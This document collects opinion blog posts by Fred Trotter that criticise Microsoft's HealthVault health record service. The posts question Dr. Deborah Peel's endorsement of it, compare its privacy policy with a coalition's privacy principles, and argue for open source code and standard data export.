HealthVault: Medically, Legally, and Politically Savvy but Technically Uninformed.

Dr. Deborah Peel has endorsed Microsoft’s HealthVault PHR. From the Patient Privacy Rights press release:

PatientPrivacyRights.Org founder, Dr. Deborah C. Peel, will stand with Microsoft in Washington, D.C today at a press conference to announce the launch of HealthVault.

Is Dr Peel qualified to make this recommendation?

Please take a look at Dr. Deborah Peel’s bio, she has done an impressive amount of medicine and privacy activism. At least on this bio, she lists no formal computer science training. On the same page we find the bio’s of the other members of the Patient Privacy Rights board members. Please note especially the bio of Tina Williamson (use this link as the one on the bio page is broken) who was formerly the Vice President of Marketing for a dot com company. This work should count as negative experience for determining the validity of marketing claims as per sourcecode. Perhaps the computer science expertise upon which Dr. Peel relies is on staff? Nope no computer science trained staff there.

According to the Patient Privacy Rights website, there is no competent electronic security or privacy expert with actual computer science training associated with Patient Privacy Rights organization. But remember the Privacy Coalition is much more than just the Patient Privacy Group! It is made up of 45 different organizations with interests in patient privacy. Perhaps some of these organizations are informing Deborah Peels recommendation of the most abusive, monopolistic software company on the planet as the “leading” caretaker of the American consumers healthcare record.

Of the 45 organizations, (which are probably great organizations…) only three are technology oriented. One of them is a meta blog site called NewsBull. For the moment I will assume that blogging expertise does not necessarily translate into informed insights into the complexities of protecting patient information, and I will exclude the possibility that informed recommendations came from NewsBull.

The other two organizations with a technical focus are Electronic Privacy Information Center (EPIC) and Computer Professionals for Social Responsibility (CPSR)

From what I can tell the most technically impressive person at EPIC is Simon Davies, the rest of the staff appear to be well-meaning policy types. I contacted him to see if he was informing Dr. Peels recommendation. His reply:

“I’m still looking into this technology and am hoping to find out more details on the security aspects fairly soon…”

Not exactly a glowing endorsement, instead it sounds like typical statements from someone who recognizes the depth of complexity involved. I doubt that Dr. Peels technical assessment was informed by Simon Davies.

CPSR, on the other hand, is clearly the home of some very serious tech talent. CPSR was one of the organizations that fought the Clipper chip nonsense. It is currently lead by Annalee Newitz and Fyodor Vaskovich, of nmap fame. These people obviously have enough technical muscle to make definitive statements regarding the security of Microsoft. I am still talking to them but so far it does not seem like they were consulted, Fyodors first response to me began:

“Hi Fred. I wouldn’t trust Microsoft with my health records either….”

Somehow, I doubt that Deborah Peel asked the author of nmap what he thought about a PHR from Microsoft before delivering her unqualified recommendations. The fact that she might have had access to that level of expertise and did not insist on consultation is pretty shocking. Of course, it takes some insight to know just how important nmap and Fyodor are in security circles.

Why would someone make a recommendation like that without possessing a tremendous amount of technical savvy or without consulting someone who had a tremendous amount of technical savvy? Only someone who assumed that this was merely a legal/medical/ethical issue rather than a legal/medical/ethical/technical issue. I have a degree in psychology, and it would be utmost of hubris for me to question a prescription that Dr. Peel gave to one of her patients. It would be totally unethical for me to recommended specific drugs to a mental health patient, despite that fact that I have some informal on-the-job experience with mental health drugs.

The problem with psychoactive drugs, and with medical information privacy, is that the devil is in the details. If I was forced to choose an anti-depression medication for someone, I would probably choose one that I had worked around alot, something with a big name that made me and my patients feel more comfortable. 8 times out of 10 my prescription might work fine, but I have no idea why it would not work the other 2 times, no idea how to determine if it was working or not and no idea what to do to fix it. I have a four year degree in mental health… what would it take for me to get that last 20% of prescribing potential? I would need two years of undergraduate courses in hard life sciences, followed by four years of medical school and then four years of residency. In short, to move from 80% accuracy in understanding of drug impact to something like 98% accuracy takes about a decade (not to mention the time required by board certification) . Hardly seems worth it… until you think about how easy it is to kill someone with drugs. Would you want to see someone who was 80% sure that the drugs you were given would not kill you?

Psychiatrists are qualified to make recommendations for mental health drugs, but their medical training does not qualify them to examine source code and determine if they match high level privacy guidelines. Based on my personal experience it takes at least 7 years to really have a clue about a specific technology area like this. I have been studying this for 13 years now, and I am often humbled when I discover just how little I know about this stuff. Even with over a decade of training I often feel overwhelmed about what I should do, just concerning the technical issues involved. I would never presume move outside of my area of expertise to make any clinical decisions.

Dr. Peel should have the same humility when it comes to technical issues. Despite this, Dr. Peel has said “Microsoft is setting an industry standard for privacy.” I am not the only one who thinks that is ridiculous.

But wait, having expertise in medicine does not exclude expertise in Computer Science generally or elctronic privacy specifically. It is possible to have both skill sets in one person.

What happens when a board certified psychiatrist also has a masters in Computer Science? What happens when the same person spent a decade studying the way information moves in a computer system AND a decade studying medicine? Then they write posts like this one from Dr. Valdes of LinuxMedNews. Granted, I tend to agree with Dr. Valdes on issues like software freedom and ethics in medical computing. Granted, there are experts at Microsoft who would be able to speak intelligently regarding the technical concerns that I am raising. Many of Microsoft’s experts have experience that are equivalent to Dr. Valdes’ training. But those experts are not speaking for 45 different organizations with legitimate interests in patient privacy endorsing a company with arguably the worst security and privacy track ever. In short, Dr. Peel is guilty of hubris. While she may have good intentions and clearly has a sincere desire to protect patient privacy, she appears to be very much past her technical depth.

Of course I could be wrong. I have not seen Dr. Peels vita. If Dr. Peel will publish her full resume and it contains solid computer science based privacy training and experience that she has left off of her online biography, I will be happy to retract some of these criticisms. The only thing that can justify Dr. Peels endorsements are a full source-code review by a professional electronic privacy expert. If Dr. Peel can show that she had access to such a review, then I would be happy to retract some of these criticisms. Finding this article unchanged and unamended implies that my assumptions about Dr. Peel are, in fact, correct.

If HealthVault were to be successful it would be good for Microsoft’s bottom line, but terrible for our cultures. Indeed Dr. Peel is right about one thing, Microsoft would be “leading” us. Those wearing shackles are often lead by others.

-Fred Trotter

HealthVault: What to do if Microsoft does nothing

Somehow I doubt that Microsoft will respond to my criticisms. This is what the Free and Open Source community needs to attempt if Microsoft refused to budge.

We need to write a tool, using the Microsoft HealthVault API to export the data from HealthVault. Preferably this should export to a standard format, but comma delimited is better than nothing.

If you are investor who wants to make a business around this tool, please contact me and I will put you in touch with a technical team (not me.. I have no interest in this just now). If you are a programmer and you would like to work on this, contact me to be part of the technical team.

When confronted with proprietary software and no alternatives, hack around the problem.

HealthVault: How to fix it

Microsoft often does the wrong thing. But that does not mean they have to. There are three requirements for behaving ethically as a PHR host.

  1. You must release all of the sourcecode to your PHR under a license that qualifies as both “Free (as-in-Freedom-not-price) Software” and Open Source.
  2. You must allow for the export of all data in a standard format like CCR.
  3. If you are going to allow “partners” to use proprietary code, (which you should not) you must inform your consumers that the medical data given to those partners could become locked.

Pretty simple. By releasing sourcecode, Microsoft would ensure that the software could be run without Microsofts help. That means that Microsoft might go away in two hundred years or so, but the HealthVault software would not. By allowing your consumers to download their data in a standard format you would ensure that the data would not be trapped in a proprietary format.

Recently Microsoft has released two licenses that were approved as open source licenses. These would be ideal for use in this environment.

Will this happen? I think it has a snowballs chance, but perhaps, if Microsoft does not listen, Google might.

HealthVault: The Food critic never took a bite.

I hope I have made my case that “patient privacy” is complex enough that merely “Recognize that patients have the right to medical privacy” is the ethical equivalent of saying “When considering the medical ethical issue of abortion , you must recognize that often women want to get pregnant and have a child.” This is a great example of a statement that sounds good, is completely true, and yet gets us nowhere.

Generally all of the “Patient Privacy Principles” have this problem. They are great principles but when you get deeper, to the level that is required when implementing software, it is obvious that they are only useful in spirit. For instance.

“Deny employers access to employees’ medical records before informed consent has been obtained”

Sounds good right? But does that mean that you will require consent to inform the employer of a workers compensation injury status? Doesn’t the employer have the right to know the ongoing status of a workplace injury without repeated informed consent? What, exactly does informed consent mean? When was the last time you started a new job and did not sign all of the fifteen CYA forms that you employer put in front of you? Does that count as informed consent? Again, obviously the spirit of the law here is good, which is something like “the employers should not be able to discriminate against employees based on health information” but that does not cut it when making software, we have to actually determine exactly what system will do and what it will not do, in order to write software.

So are the Privacy Principles flawed? Only when their interpretation is left to a private company with no possible way for patients to review how the code actually works!

Deborah Peels endorsement of Microsoft’s HealthVault is the equivalent of a food critic looking at a magazine food ad to make a recommendation for a restaurant. Have you ever looked at those ads when you were really hungry, you see the roasted turkey browned to perfection with a pat of butter slowly melting on it. Looks delicious! It is impossible to make that photograph with food that also tastes good. Food photographers work all day on food photographs, they cannot afford to have food that changes in appearance over the course of an hour. Can you imagine trying to include a fresh bowl of guacamole in a picture with ten other foods? Long before the picture was ready the guacamole would look disgusting. That beautiful turkey browned to perfection is actually a frozen turkey that has had the skin “browned” using a paint remover gun. The pat of butter… well, lets just say its not butter. I know this might seem obvious, but in order to judge the quality of food, a food critic must actually taste the dish.

There is no way that Dr. Peel can verify one way or another that HealthVault works the way Microsoft says it does. For instance, it would be trivial for every new piece of data for every patient to be automatically emailed to Bill Gates, or Fred Trotter. That “email the record” functionality would change nothing in the appearance of the user interface that Dr. Peel evaluated (I assume she looked at the interface). The only way to sort this out is to examine the sourcecode. Any competent Computer Scientist would acknowledge that this is trivially true: obviously it is not what Microsoft says that matters, nor is it what the software appears to do! What matters is what the software actually does and the only way to determine this, one way or another is to read the sourcecode. There is a long and glorious tradition in the software industry of shall we say “fudging” what the software actually does for marketing purposes. Is Dr. Peel qualified to examine this source code vs. marketing material gap? More on this issue later.

-FT

HealthVault: No Commitments and a Sleeping Watchdog.

Has Microsoft committed to keeping the promises that it has already made? No, just the opposite. Their privacy policy concludes:“We may occasionally update this privacy statement”

Which means that when the commitments that Microsoft has made regarding HealthVault become inconvenient, they will simply change them.

Will the data that you enter into HealthVault be secure? Would my HealthVault data be studied by my insurance company? Would access be limited to those who I choose to have access? Thank goodness Microsoft’s answer to this question was not simply “Trust Me”! Instead it is “Trust my auditor”. This is, apparently enough to satisfy the Patient Privacy Rights Foundation, and the Coalition for Patient Privacy. From a recent Patient Privacy Rights press release Dr Deborah Peel is quoted:

“Corporate claims to offer privacy mean nothing unless they are willing to take the same steps Microsoft has taken in building HealthVault,” says Peel. Microsoft has committed to independent third party audits to verify their pledge to protect privacy. “Audits are essential,” says Peel. “Technology companies have got to do better than telling consumers to just ‘trust us.’ Consumers shouldn’t trust anyone but themselves to decide who can see and use their sensitive health information.”

Microsoft’s HealthVault Privacy Policy does not have the word “audit” in it anywhere. Apparently Dr. Peel assumes that Microsoft telling her that they will get audits is sufficient to ensure that they will. Interestingly the only place that the Microsoft HealthVault press release mentions audits are when they are quoting Peel.

Apparently, this means “trust the auditors”. Of course we all know how well audits serve to protect the public from unethical corporate behavior. The alternative, which is obviously not being discussed, is the ability to inspect the code for yourself. A top GPL licensed PHR is IndivoHealth. Lets do a quick comparison.

Question: PHR Covered by HIPAA?

IndivoHealth: When it is used by a covered entity, yes.

HealthVault: No. Microsoft is not a covered entity.

Question: How is this verifiable? How can you trust that the user really has control? How can you trust that there is no proprietary back door built in to the software?

IndivoHealth: Read the IndivoHealth source code yourself. Hire an auditor of your choice to review the sourcecode. Verify that the auditor you hired is telling you the truth by hiring another auditor, again of your choice. Verify that both auditors you chose and hired are not full of… smoke… by reading the source code yourself.

HealthVault: Trust Microsoft. Trust the auditor that Microsoft pays millions of dollars a year to whistle blow on Microsoft.

I think you get the idea. Nonetheless, Deborah Peel is pretty impressed with HealthVault, from a HealthcareITNews article:

“Their model is that consumers truly should control the information and that’s the direction they want to take as a company,” said Peel. “We really think that because they are the industry leader that the rest of industry will have to follow or be left behind.”

Further:

“Microsoft has agreed to adhere to all of the privacy principles that the coalition developed in 2007, ” Peel said. “Not only adhere to them in terms of contracts but to be audited on these principles. We think they’re setting a new amazingly high bar and frankly, we think what they’re doing is really the best practice that the entire industry needs to follow.”

Well, this is good! Microsoft has agreed to follow the privacy principles! Principles are good. What are the principles? We find the principles at Patient Privacy Rights website lets go through them one at a time..

  • Recognize that patients have the right to medical privacy* (later defined as: Health information privacy is an individual’s right to control the acquisition, uses, or disclosures of his or her identifiable health data.

Microsoft’s privacy policy: ” Microsoft is committed to protecting your privacy.” I guess that settles that.

  • Recognize that user interfaces must be accessible so that health consumers with disabilities can individually manage their health records to ensure their medical privacy

Actually, Microsoft deserves credit for generally working hard in this area. Give credit where it is do. However, no commitment is made in the privacy document regarding accessibility.

  • The right to medical privacy applies to all health information regardless of the source, the form it is in, or who handles it

Microsoft’s privacy policy: “This privacy statement applies to the data collected by Microsoft through the Microsoft HealthVault beta version (the “Service”); it does not apply to data collected through other online or offline Microsoft sites, products, or services.” So much for “no matter what the source”. Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Give patients the right to opt-in and opt-out of electronic system

Microsoft’s policy indicates that users can quit the system and Microsoft will then delete the data after 90 days. So much for seven generations of custodianship but I guess deleting meets the “opt-out” requirement.

  • Give patients the right to segment sensitive information

No commitment of segmenting information in the privacy statement.

  • Give patients control over who can access their electronic health records

HealthVault says that users can appoint “custodians” your record. Those custodians can then pass this custodian privilege on to others. Ultimately a HealthVault record can easily get out of control of the original owner. That is not to say that this is not a cool feature, but it does not work with the principles. From the HealthVault privacy policy “Because inappropriate granting of access could allow a grantee to violate your privacy or even revoke your access to your own records, we urge you to consider all the consequences carefully before you grant access to your records.” Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Health information disclosed for one purpose may not be used for another purpose before informed consent has been obtained

You can give your health information to “Programs” offered by third party companies. But how will that data be used? From the HealthVault privacy policy: “Please refer to the privacy statements of those Programs for information about their privacy policies, and about how your information will be used by those Programs.” Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Require audit trails of every disclosure of patient information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Require that patients be notified promptly of suspected or actual privacy breaches

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Ensure that consumers can not be compelled to share health information to obtain employment, insurance, credit, or admission to schools, unless required by statute

Whose statutes? If my record is in China, does that government have the right to get to it? Microsoft explicitly states ” Personal information collected on the Service may be stored and processed in the United States or any other country in which Microsoft or its affiliates, subsidiaries, or agents maintain facilities, and by using the Service, you consent to any such transfer of information outside of the U.S. “ Given that a US record stored in an offshore site can be compelled by a foreign government. Microsoft’ HealthVault privacy policy contradicts this Privacy Principle

  • Deny employers access to employees’ medical records before informed consent has been obtained

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Preserve stronger privacy protections in state laws

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • No secret health databases. Consumers need a clean slate. Require all existing holders of health information to disclose if they hold a patient’s health information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Provide meaningful penalties and enforcement mechanisms for privacy violations detected by patients, advocates, and government regulators

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

In short, Microsoft’s commitment to follow the policy is a commitment that they have NOT made in their policy. Microsoft is basically saying “Trust us, this is secure and private”. Everything about Microsoft’s history indicates that commitments to privacy and security are bogus. What exactly made the Dr. Peel conclude they are the market leader in Health Record security and privacy? What made her conclude that Microsoft has “committed” to third party audits?

Perhaps Dr. Peel is discussing a subject as though she were an expert, when in fact she has had little relevant training on the subject.

HealthVault: Abusing vs Implementing Standards.

Microsoft, of all the companies that might consider creating a PHR, is especially problematic. Microsoft has a long history of standards abuse.

Lets consider a parallel issue to the “personal health record”, personal email. I use gmail and have used yahoo mail in the past, but for this example lets pretend that I used Hotmail, a Microsoft Product. Hotmail users trust Microsoft to protect and store potentially sensitive personal email data. I currently have at least a gigabyte of personal messages on my mail account. At this rate I will have at least 100 gigs of messages assuming I die of old age. What if my wife (who will likely outlive me given that she is younger and averse to simple sugars, cholesterol, sodium and saturated fats in a way that I am not) wanted to ensure that my emails survived Microsoft’s eventual demise? After inheriting my password, my wife could download everything via Hotmail’s POP3 service. She could download my emails to a proprietary package like Outlook, or better yet, a GPL email application. She could transfer them to another service that she trusted, like gmail.

By leveraging Hotmail’s POP3 interface she would be taking responsibility for the continued storage of my emails, and ensuring that my great-grandkids could know for certain exactly how many time the Nigerians contacted me with a special offer because they trust me so much.

But what about my “HealthVault” account? How could my wife ensure that my great-grand kids know about last months cholesterol results? Knowing my cholesterol history is going to be vastly more relevant to them, then the time and place of last week’s LAN-party. To make this possible Microsoft would have to export the data in a format vastly more complex than POP3, perhaps something like the Continuity of Care Record CCR.

The problem with formats like CCR is that they are not strong standards and suffer greatly from the dialect problem. The dialect problem is when the “implementations” of a “standard” differ enough to make them incompatible. When a person from Australia, England, and the US speak English to each other they typically understand each other, because the dialects of English are close enough that they are compatible. Alternatively French, Spanish, and Italian technically could be considered “dialects” of Latin, yet obviously speakers of these languages cannot, without translation, understand each other completely. CCR and the other electronic medical languages are currently suffering from the dialect problem. Show me two HL7 implements and I will show you two systems that cannot communicate without “translation” work. (BTW the FOSS way to solve this problem is with Mirth, which is an HL7 router) Protocols that suffer from the dialect problem so much that they typically cannot communicate effectively without extensive configuration can be thought of as “weak standards”. Protocols that are not impacted negatively by the dialect problem are “strong standards” (a good example of a strong standard is the TCP/IP protocol and FAX protocols)

Microsoft is famous for incorrectly implementing standards and creating new incompatible dialects. Microsoft has done this even when it goes in the face of a previously strong standard. Then they use their monopoly position to push adoption of their own dialect of a standard. Adoption of the Microsoft dialect then increases the reach and influence of the Microsoft monopoly, which increases Microsoft’s ability to enforce their own dialects, etc etc. In fact when concerning a previously strong standard, this has been famously called Microsoft’s embrace, extend and extinguish strategy. If you have no idea what I am talking about then Google for the history of Microsoft’s implementations of Java, Kerberos and Javascript.

Not only has Microsoft not committed to implementing and not abusing a standard import and export format, it is making moves to create a proprietary standard in the place of CCR. HealthVault already has a MSDN page where you can learn how to “interface” with the Microsoft PHR. Microsoft intends to create a community of “Programs” within Healthvault by which third parties can further process medical data. Those programs will interface with Healthvault in a fashion that will create a “de facto standard” that Microsoft will abuse. (For more on this research the history of the Microsoft Word format, which is a good example of a Microsoft format that became a de facto standard which Microsoft subsequently abused) .

HealthVault: Failing the seven generations test

(note: This is the first of my “week of HealthVault” articles.)

HealthVault, the new Personal Health Record (PHR) from Microsoft, along with Googles coming PHR offering, fail the seven generations test.

I did not come up with the idea of “seven generations”, pay attention the next time you go to the grocery store and you might notice a brand of laundry detergent called seventh generation. The company behind the product got their name from a suggestion by a Native American employee that they follow the principles that lead the Six Nations Iroquois Confederacy . The council of the Iroquois considered how any decision would impact the next seven generations. Lets see how the principles apply to health IT.

My mother died of ovarian cancer. My grandmother took a drug while my mother was in utero that increase the chances that my mother would get ovarian cancer. Any consideration given to my mothers genetic propensity to get cancer must take into account this environmental influence. My daughters and grand-daughters will inherit my genes, and perhaps some risks for ovarian cancer that my mother passed on to me. As my granddaughters make life choices based on their genetic propensities, they must take my grandmothers medical records into consideration. My grandmothers medical record will remain relevant for at least five generations.

Lets consider DNA. Our understanding of DNA is only relevant in the context that DNA causes health conditions in the real world. We will not be able to understand DNA sequences fully until we have compared them to medical records over the course of several generations. My great-great-grandchildren need copies of both my medical records and my DNA sequence. Until we can pass these kinds of insights to our progeny we will not have realized the potential for DNA research.

How long should we be keeping our electronic medical records? We should ensure that they are available for the next seven generations. Assuming one generation lasts for 100 years, that means 700 years of storing digital records. Many academics think that a “generation” should be defined as 20 years but this does not work here. If I develop arthritis in my 20’s that fact is medically relevant for my great-great-great-grandchildren in their 90’s. 100 years is a whole life-time and also makes for easy math. In any case, all of my points are still relevant if one counts a generation as 20 years or 50 years instead of 100.

A private, for-profit, corporation is an inappropriate storehouse for records that the next seven generations will need. Corporations do not last long enough. Consider the Dow Jones Industrial Average. Of the original 12 companies that made up the index, only one is still listed: GE. Some of these original companies were taken private, some were merged, some were destroyed. That is the course of the largest companies in the United States over the course of a little more than 100 years. The Honorable East India Company was founded in 1600 and dissolved in 1858. In 1700, however, it was one of the most trusted companies in the world, with a monopoly on par with Microsoft’s. Now the East India Company is no more. Someday Microsoft will go away too. Perhaps Google will buy it in 150 years, perhaps it will go bankrupt in 200 years. In any case Microsoft will not be in business in 700 years. If Google had released its PHR first, this article would have been about them. The Google “do-no-evil” motto is probably the best corporate motto I have ever heard of! Further it is obvious that Google takes this very seriously, as evidenced by their refusal to offer email service in China, a decision that will eventually cost them billions, but separates them from Microsoft and Yahoo. They still censor in China, but at least Google is thinking about the problem in the right way; from a moral perspective.

However, the Google motto is not “do no evil for the next 700 years”. This not about “which” company is acceptable for the stewardship of medical records. NO company is qualified. Even Google will not be around in 700 years.

But this is still Microsoft we are talking about, which all things being equal, is especially bad. Microsoft has a history of abusing standards, and using those abuses to enable and extend its monopolies. In short they have a history of “being evil” in exactly the sort of way that we cannot afford to have impact our healthcare records.